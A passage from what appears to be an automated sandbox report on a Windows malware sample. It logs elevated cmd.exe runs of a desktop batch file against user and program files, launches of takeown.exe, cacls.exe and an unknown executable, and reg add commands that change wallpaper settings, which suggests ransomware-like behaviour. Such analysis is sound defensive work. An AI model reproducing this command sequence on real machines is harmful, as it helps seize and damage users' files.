| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x35c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x854, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xdac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "To_Do_List.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "To_Do_List.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #19: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:48, Reason: Child Process |
| Unmonitor | End Time: 00:01:52, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe88 |
| Parent PID | 0xd98 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EA0
0x
E54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000070000 | 0x00070000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x0007ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00083fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00091fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00090000 | 0x00099fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00161fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x0022dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x003d0000 | 0x004aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x005d0000 | 0x00906fff | Memory Mapped File | r |
|
|
|
- |
| reg.exe | 0x00960000 | 0x009b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x049bffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x769b0000 | 0x76a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x773e0000 | 0x773e6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee30000 | 0x7ee30000 | 0x7ef2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef30000 | 0x7ef30000 | 0x7ef52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef53000 | 0x7ef53000 | 0x7ef53fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef58000 | 0x7ef58000 | 0x7ef5afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5b000 | 0x7ef5b000 | 0x7ef5bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5d000 | 0x7ef5d000 | 0x7ef5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x960000 |
|
1 |
Process #20: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:49, Reason: Child Process |
| Unmonitor | End Time: 00:02:32, Reason: Self Terminated |
| Monitor Duration | 00:00:43 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xea4 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E4C
0x
E9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000760000 | 0x00760000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x0076ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x00773fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00781fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00783fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x007a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x008f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00911fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x04faffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04fb0000 | 0x052e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f410000 | 0x7f410000 | 0x7f50ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f510000 | 0x7f510000 | 0x7f532fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f536000 | 0x7f536000 | 0x7f536fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f537000 | 0x7f537000 | 0x7f539fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f53a000 | 0x7f53a000 | 0x7f53afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f53d000 | 0x7f53d000 | 0x7f53ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 25 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xb5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x644, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x5d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "ImagingDevices.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "ImagingDevices.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #22: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:51, Reason: Child Process |
| Unmonitor | End Time: 00:01:54, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xddc |
| Parent PID | 0xd98 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3A8
0x
858
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000720000 | 0x00720000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x0072ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00733fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00741fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00740000 | 0x00749fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x00763fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x007f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x00811fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00820000 | 0x008ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| reg.exe | 0x00960000 | 0x009b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x049bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
